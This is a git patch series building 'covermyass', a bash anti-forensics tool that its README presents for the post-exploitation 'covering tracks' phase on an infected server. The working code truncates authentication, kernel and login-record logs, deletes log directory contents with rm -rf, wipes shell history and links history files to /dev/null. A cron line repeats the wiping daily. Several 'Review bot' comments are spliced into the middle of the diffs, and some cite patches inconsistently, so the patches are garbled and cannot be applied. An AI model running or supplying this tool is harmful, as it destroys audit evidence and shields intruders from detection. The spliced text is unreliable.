From 0e04932479135b2c76673ada1043e27873c3404f Mon Sep 17 00:00:00 2001
From: Raphael
Date: Fri, 18 Jan 2019 17:17:00 +0100
Subject: [PATCH 01/12] Update .travis.yml
---
 .travis.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/.travis.yml b/.travis.yml
index 0ec2e44..e75d9ad 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,3 +1,6 @@
 os: linux
-script: echo "test" && exit 1
+script:
+- chmod +x *.sh
+- ./install.sh
+- shellcheck covermyass
From 3ceb15f619371652b08697a4c8698f02ab1f36f5 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Fri, 18 Jan 2019 17:20:23 +0100
Subject: [PATCH 02/12] Use sudo
---
 .travis.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.travis.yml b/.travis.yml
index e75d9ad..7bb375e 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -2,5 +2,5 @@
 os: linux
 script:
 - chmod +x *.sh
-- ./install.sh
+- sudo ./install.sh
 - shellcheck covermyass
From 3d253c5adfd877972e115ffcd727afe5f6aa7443 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 15:27:42 +0100
Subject: [PATCH 03/12] Typo
---
 .travis.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.travis.yml b/.travis.yml
index 7bb375e..0c1e357 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -3,4 +3,4 @@ os: linux
 script:
 - chmod +x *.sh
 - sudo ./install.sh
-- shellcheck covermyass
+- shellcheck covermyass.sh
From fae01e0a64aba828e9e421c62d7154bbb451fa61 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 15:32:54 +0100
Subject: [PATCH 04/12] Build status
---
 README.md | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index db900a2..6b8deb0 100644
--- a/README.md
+++ b/README.md
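Review bot: The lint step covers only `covermyass` (corrected to `covermyass.sh` in PATCH 03/12) while `install.sh` is executed in the same job — under `sudo` from PATCH 02/12 onward — without ever passing through ShellCheck. A script that runs as root in CI is the one that most needs the check, and extending the existing step is a one-word change: `- shellcheck covermyass.sh install.sh`. The `chmod +x *.sh` line also leaves it to the glob to decide what gets made executable; naming the two scripts explicitly would document what the job expects to find.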
@@ -1,8 +1,10 @@
-# Cover my ass
+# Covermyass
+
+![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square)
 CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history.
-**This tool supports zsh shell.**
+**This tool supports zsh & bash shell.**
 ## Installation
@@ -45,15 +47,17 @@ Select an option :
 >
 ```
-Clear auth & history instantly
+*NOTE: don't forget to exit the terminal session as the history is cached.*
+
+Clear auth & history instantly :
 ```
-covermyass now
+sudo covermyass now
 ```
 ### Using cron job
-Clear auth & bash history every day at 5am
+Clear bash history every day at 5am :
 ```
 0 5 * * * covermyass now >/dev/null 2>&1
From 95b4577dc558c6a5ef004147933d93dd2959f02d Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 15:50:20 +0100
Subject: [PATCH 05/12] Documentation
---
 README.md | 19 ++++++++++++++++++-
 1 file changed, 18 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 6b8deb0..4994899 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,26 @@
 # Covermyass
 ![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square)
+![Tag](https://img.shields.io/github/tag/SundownDEV/covermyass.svg?style=flat-square)
 CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history.
+This tool allows you to clear log files such as :
+
+- `/var/log/messages` : General message and system related stuff
+- `/var/log/auth.log` : Authenication logs
+- `/var/log/kern.log` : Kernel logs
+- `/var/log/cron.log` : Crond logs (cron job)
+- `/var/log/maillog` : Mail server logs
+- `/var/log/qmail/` : Qmail log directory (more files inside this directory)
+- `/var/log/httpd/` : Apache access and error logs directory
+- `/var/log/lighttpd/` : Lighttpd access and error logs directory
+- `/var/log/boot.log` : System boot log
+- `/var/log/mysqld.log` : MySQL database server log file
+- `/var/log/secure` or `/var/log/auth.log` : Authentication log
+- `/var/log/utmp` or `/var/log/wtmp` : Login records file
+- `/var/log/yum.log` : Yum command log file.
+
 **This tool supports zsh & bash shell.**
 ## Installation
@@ -47,7 +64,7 @@ Select an option :
 >
 ```
-*NOTE: don't forget to exit the terminal session as the history is cached.*
+*NOTE: don't forget to exit the terminal session since the bash history is cached.*
 Clear auth & history instantly :
From 6ae975829554755ed24f86fa5a81085a8048151f Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 15:55:02 +0100
Subject: [PATCH 06/12] Documentation
---
 README.md | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 4994899..68cb58a 100644
--- a/README.md
+++ b/README.md
@@ -3,10 +3,12 @@
 ![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square)
 ![Tag](https://img.shields.io/github/tag/SundownDEV/covermyass.svg?style=flat-square)
-CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history.
+CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable system logs for post-exploitation.
 This tool allows you to clear log files such as :
+**Linux**
+
 - `/var/log/messages` : General message and system related stuff
 - `/var/log/auth.log` : Authenication logs
 - `/var/log/kern.log` : Kernel logs
@@ -21,6 +23,16 @@ This tool allows you to clear log files such as :
 - `/var/log/utmp` or `/var/log/wtmp` : Login records file
 - `/var/log/yum.log` : Yum command log file.
+**macOS**
+
+- `/var/log` : System Log Folder
+- `/var/log/system.log` : System Log
+- `/var/log/DiagnosticMessages` : Mac Analytics Data
+- `/Library/Logs` : System Application Logs
+- `/Library/Logs/DiagnosticReports` : System Reports
+- `~/Library/Logs` : User Application Logs (in other words, /Users/NAME/Library/Logs)
+- `~/Library/Logs/DiagnosticReports` : User Reports (in other words, /Users/NAME/Library/Logs/DiagnosticReports)
+
 **This tool supports zsh & bash shell.**
 ## Installation
From ff85e664922b128a5826a72bf6b6ecc6a547ead6 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 16:24:24 +0100
Subject: [PATCH 07/12] Documentation
---
 README.md | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 68cb58a..7b87eb3 100644
--- a/README.md
+++ b/README.md
@@ -22,6 +22,7 @@ This tool allows you to clear log files such as :
 - `/var/log/secure` or `/var/log/auth.log` : Authentication log
 - `/var/log/utmp` or `/var/log/wtmp` : Login records file
 - `/var/log/yum.log` : Yum command log file.
+- `~/.bash_history` and `~/.zsh_history` : User commands history
 **macOS**
@@ -51,7 +52,7 @@ curl -sSL https://raw.githubusercontent.com/sundowndev/covermyass/master/covermy
 chmod +x ./covermyass
 ```
-Keep in mind that without sudo privileges, you'll be unable to clean auth logs.
+Keep in mind that without sudo privileges, you *might* be unable to system level log files (`/var/log`).
 ## Usage
@@ -68,7 +69,7 @@ Welcome to Cover my ass tool !
 Select an option :
-1) Clear auth & bash history for user root
+1) Clear logs for user root
 2) Permenently disable auth & bash history
 3) Restore settings to default
 99) Exit tool
@@ -78,7 +79,7 @@ Select an option :
 *NOTE: don't forget to exit the terminal session since the bash history is cached.*
-Clear auth & history instantly :
+Clear logs instantly (requires *sudo* to be efficient) :
 ```
 sudo covermyass now
From 208e6151744e6d87c3c1480c4e8a0871bc454c29 Mon Sep 17 00:00:00 2001
From: sundowndev
Date: Sun, 17 Mar 2019 16:45:53 +0100
Subject: [PATCH 08/12] Clear log function
---
 covermyass.sh | 51 +++++++++++++++++++++++++++++++++++++++++----------
 1 file changed, 41 insertions(+), 10 deletions(-)
diff --git a/covermyass.sh b/covermyass.sh
index 67bdef0..4aa4c07 100755
--- a/covermyass.sh
+++ b/covermyass.sh
@@ -1,5 +1,24 @@
 #!/usr/bin/env bash
+LOGS_FILES=(
+ /var/log/messages
+ /var/log/auth.log
+ /var/log/kern.log
+ /var/log/cron.log
+ /var/log/maillog
+ /var/log/boot.log
+ /var/log/mysqld.log
+ /var/log/secure
+ /var/log/utmp
+ /var/log/yum.log
+ /var/log/system.log
+ /var/log/DiagnosticMessages
+ /Library/Logs
+ ~/Library/Logs
+ /Library/Logs/DiagnosticReports
+ ~/Library/Logs/DiagnosticReports
+)
+
 function isRoot () {
 if [ "$EUID" -ne 0 ]; then
 return 1
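Review bot: LOGS_FILES mixes plain files with whole directories (`/Library/Logs`, `~/Library/Logs` and their DiagnosticReports subfolders) and nothing in the array marks which is which, yet the consumer added in this commit empties a directory entry with `rm -rf`, so everything under those paths is removed, not only log files. That difference in blast radius belongs in a comment above the array so a later entry is not added by analogy with the file entries: `# Plain files are truncated by clearLogs; directories have their ENTIRE contents removed`. Since the list is never modified afterwards, making the assignment `readonly LOGS_FILES=(...)` would also state that explicitly.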
@@ -87,13 +106,25 @@ function enableHistory () {
 echo "Permenently enabled bash log."
 }
-function clearAuth () {
- if [ -w /var/log/auth.log ]; then
- echo "" > /var/log/auth.log
- echo "[+] /var/log/auth.log cleaned."
- else
- echo "[!] /var/log/auth.log is not writable! Retry using sudo."
- fi
+function clearLogs () {
+ for i in ${LOGS_FILES[@]}
+ do
+ if [ -f $i ]; then
+ if [ -w $i ]; then
+ echo "" > $i
+ echo "[+] $i cleaned."
+ else
+ echo "[!] $i is not writable! Retry using sudo."
+ fi
+ elif [ -d $i ]; then
+ if [ -w $i ]; then
+ rm -rf $i/*
+ echo "[+] $i cleaned."
+ else
+ echo "[!] $i is not writable! Retry using sudo."
+ fi
+ fi
+ done
 }
 function clearHistory () {
@@ -117,11 +148,11 @@ function exitTool () {
 exit 1
 }
-clear # Clear output
+# clear # Clear output
 # "now" option
 if [ -n "$1" ] && [ "$1" == 'now' ]; then
- clearAuth
+ clearLogs
 clearHistory
 exitTool
 fi
@@ -130,7 +161,7 @@ menu
 if [[ $option == 1 ]]; then
 # Clear current history
- clearAuth
+ clearLogs
 clearHistory
 elif [[ $option == 2 ]]; then
 # Permenently disable auth & bash log
From be7af5f2ce3b095e7e00858960f414ca572c7b30 Mon Sep 17 00:00:00 2001
From: sundowndev
Date: Sun, 17 Mar 2019 16:58:37 +0100
Subject: [PATCH 09/12] Logs files comments
---
 covermyass.sh | 42 +++++++++++++++++++++++------------------
 1 file changed, 23 insertions(+), 19 deletions(-)
diff --git a/covermyass.sh b/covermyass.sh
index 4aa4c07..5601448 100755
--- a/covermyass.sh
+++ b/covermyass.sh
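Review bot: clearLogs prints `[+] $i cleaned.` unconditionally after the redirection and after `rm -rf`, so the report claims success even when the write or the removal failed; `-w` reflects permission bits only, and `rm -rf` over a directory's contents can fail partway through. Tie the message to the status, e.g. `if echo "" > "$i"; then echo "[+] $i cleaned."; else echo "[!] $i could not be cleaned."; fi`, and the same around the `rm -rf` branch. The same lines survive unchanged in PATCH 12/12, which only adds quoting. The `clear` → `# clear` toggle in the next hunk is unrelated to the commit's subject and is reverted in PATCH 09/12; it would be better left out of this commit.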
@@ -1,22 +1,26 @@
 #!/usr/bin/env bash
 LOGS_FILES=(
- /var/log/messages
- /var/log/auth.log
- /var/log/kern.log
- /var/log/cron.log
- /var/log/maillog
- /var/log/boot.log
- /var/log/mysqld.log
- /var/log/secure
- /var/log/utmp
- /var/log/yum.log
- /var/log/system.log
- /var/log/DiagnosticMessages
- /Library/Logs
- ~/Library/Logs
- /Library/Logs/DiagnosticReports
- ~/Library/Logs/DiagnosticReports
+ /var/log/messages # General message and system related stuff
+ /var/log/auth.log # Authenication logs
+ /var/log/kern.log # Kernel logs
+ /var/log/cron.log # Crond logs
+ /var/log/maillog # Mail server logs
+ /var/log/boot.log # System boot log
+ /var/log/mysqld.log # MySQL database server log file
+ /var/log/qmail # Qmail log directory
+ /var/log/httpd # Apache access and error logs directory
+ /var/log/lighttpd # Lighttpd access and error logs directory
+ /var/log/secure # Authentication log
+ /var/log/utmp # Login records file
+ /var/log/wtmp # Login records file
+ /var/log/yum.log # Yum command log file
+ /var/log/system.log # System Log
+ /var/log/DiagnosticMessages # Mac Analytics Data
+ /Library/Logs # System Application Logs
+ /Library/Logs/DiagnosticReports # System Reports
+ ~/Library/Logs # User Application Logs
+ ~/Library/Logs/DiagnosticReports # User Reports
 )
 function isRoot () {
@@ -56,7 +60,7 @@ function disableHistory () {
 ln /dev/null ~/.bash_history -sf
 echo "[+] Permanently sending bash_history to /dev/null"
- if [ -a ~/.zsh_history ]; then
+ if [ -f ~/.zsh_history ]; then
 ln /dev/null ~/.zsh_history -sf
 echo "[+] Permanently sending zsh_history to /dev/null"
 fi
@@ -128,7 +132,7 @@ function clearLogs () {
 }
 function clearHistory () {
- if [ -a ~/.zsh_history ]; then
+ if [ -f ~/.zsh_history ]; then
 echo "" > ~/.zsh_history
 echo "[+] ~/.zsh_history cleaned."
 fi
@@ -148,7 +152,7 @@ function exitTool () {
 exit 1
 }
-# clear # Clear output
+clear # Clear output
 # "now" option
 if [ -n "$1" ] && [ "$1" == 'now' ]; then
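Review bot: Replacing `-a` with `-f` in disableHistory and clearHistory changes which files qualify: `-f` follows symlinks and requires a regular file, so once disableHistory has pointed `~/.zsh_history` at /dev/null (the `ln ... -sf` on the line after the test) both functions skip it, where `-a` still accepted it. That is plausibly the intent, since there is nothing left to truncate or re-link, but it is not stated anywhere; a comment on each test would spare the next reader the analysis: `# -f, not -a: a history already symlinked to /dev/null is skipped`. The bash_history branch just above has no such guard and re-links unconditionally, which works but is asymmetric. Both disableHistory and clearHistory begin outside their hunks.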
From b167145b36fd6366563be04b10c8369945aef7ac Mon Sep 17 00:00:00 2001
From: Raphael
Date: Sun, 17 Mar 2019 16:59:13 +0100
Subject: [PATCH 10/12] Documentation
---
 README.md | 53 +++++++++++++++++++++++++---------------------------
 1 file changed, 25 insertions(+), 28 deletions(-)
diff --git a/README.md b/README.md
index 7b87eb3..1e542df 100644
--- a/README.md
+++ b/README.md
@@ -7,34 +7,31 @@ CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Coverin
 This tool allows you to clear log files such as :
-**Linux**
-
-- `/var/log/messages` : General message and system related stuff
-- `/var/log/auth.log` : Authenication logs
-- `/var/log/kern.log` : Kernel logs
-- `/var/log/cron.log` : Crond logs (cron job)
-- `/var/log/maillog` : Mail server logs
-- `/var/log/qmail/` : Qmail log directory (more files inside this directory)
-- `/var/log/httpd/` : Apache access and error logs directory
-- `/var/log/lighttpd/` : Lighttpd access and error logs directory
-- `/var/log/boot.log` : System boot log
-- `/var/log/mysqld.log` : MySQL database server log file
-- `/var/log/secure` or `/var/log/auth.log` : Authentication log
-- `/var/log/utmp` or `/var/log/wtmp` : Login records file
-- `/var/log/yum.log` : Yum command log file.
-- `~/.bash_history` and `~/.zsh_history` : User commands history
-
-**macOS**
-
-- `/var/log` : System Log Folder
-- `/var/log/system.log` : System Log
-- `/var/log/DiagnosticMessages` : Mac Analytics Data
-- `/Library/Logs` : System Application Logs
-- `/Library/Logs/DiagnosticReports` : System Reports
-- `~/Library/Logs` : User Application Logs (in other words, /Users/NAME/Library/Logs)
-- `~/Library/Logs/DiagnosticReports` : User Reports (in other words, /Users/NAME/Library/Logs/DiagnosticReports)
-
-**This tool supports zsh & bash shell.**
+```bash
+# Linux
+/var/log/messages # General message and system related stuff
+/var/log/auth.log # Authenication logs
+/var/log/kern.log # Kernel logs
+/var/log/cron.log # Crond logs
+/var/log/maillog # Mail server logs
+/var/log/boot.log # System boot log
+/var/log/mysqld.log # MySQL database server log file
+/var/log/qmail # Qmail log directory
+/var/log/httpd # Apache access and error logs directory
+/var/log/lighttpd # Lighttpd access and error logs directory
+/var/log/secure # Authentication log
+/var/log/utmp # Login records file
+/var/log/wtmp # Login records file
+/var/log/yum.log # Yum command log file
+
+# macOS
+/var/log/system.log # System Log
+/var/log/DiagnosticMessages # Mac Analytics Data
+/Library/Logs # System Application Logs
+/Library/Logs/DiagnosticReports # System Reports
+~/Library/Logs # User Application Logs
+~/Library/Logs/DiagnosticReports # User Reports
+```
 ## Installation
From 7c74fddab28586e730e0c2d4fd7499fb15eda150 Mon Sep 17 00:00:00 2001
From: sundowndev
Date: Sun, 17 Mar 2019 17:01:07 +0100
Subject: [PATCH 11/12] Menu
---
 covermyass.sh | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/covermyass.sh b/covermyass.sh
index 5601448..15d1c69 100755
--- a/covermyass.sh
+++ b/covermyass.sh
@@ -36,7 +36,7 @@ function menu () {
 echo
 echo "Select an option :"
 echo
- echo "1) Clear auth & bash history for user $USER"
+ echo "1) Clear logs for user $USER"
 echo "2) Permenently disable auth & bash history"
 echo "3) Restore settings to default"
 echo "99) Exit tool"
@@ -164,7 +164,7 @@ fi
 menu
 if [[ $option == 1 ]]; then
- # Clear current history
+ # Clear logs & current history
 clearLogs
 clearHistory
 elif [[ $option == 2 ]]; then
From 99a9034c5cdf3b54ff36913d74a65202aa18b47a Mon Sep 17 00:00:00 2001
From: sundowndev
Date: Sun, 17 Mar 2019 17:09:29 +0100
Subject: [PATCH 12/12] Fix shellcheck errors
---
 covermyass.sh | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/covermyass.sh b/covermyass.sh
index 15d1c69..35506fc 100755
--- a/covermyass.sh
+++ b/covermyass.sh
@@ -111,18 +111,18 @@ function enableHistory () {
 }
 function clearLogs () {
- for i in ${LOGS_FILES[@]}
+ for i in "${LOGS_FILES[@]}"
 do
- if [ -f $i ]; then
- if [ -w $i ]; then
- echo "" > $i
+ if [ -f "$i" ]; then
+ if [ -w "$i" ]; then
+ echo "" > "$i"
 echo "[+] $i cleaned."
 else
 echo "[!] $i is not writable! Retry using sudo."
 fi
- elif [ -d $i ]; then
- if [ -w $i ]; then
- rm -rf $i/*
+ elif [ -d "$i" ]; then
+ if [ -w "$i" ]; then
+ rm -rf "${i:?}"/*
 echo "[+] $i cleaned."
 else
 echo "[!] $i is not writable! Retry using sudo."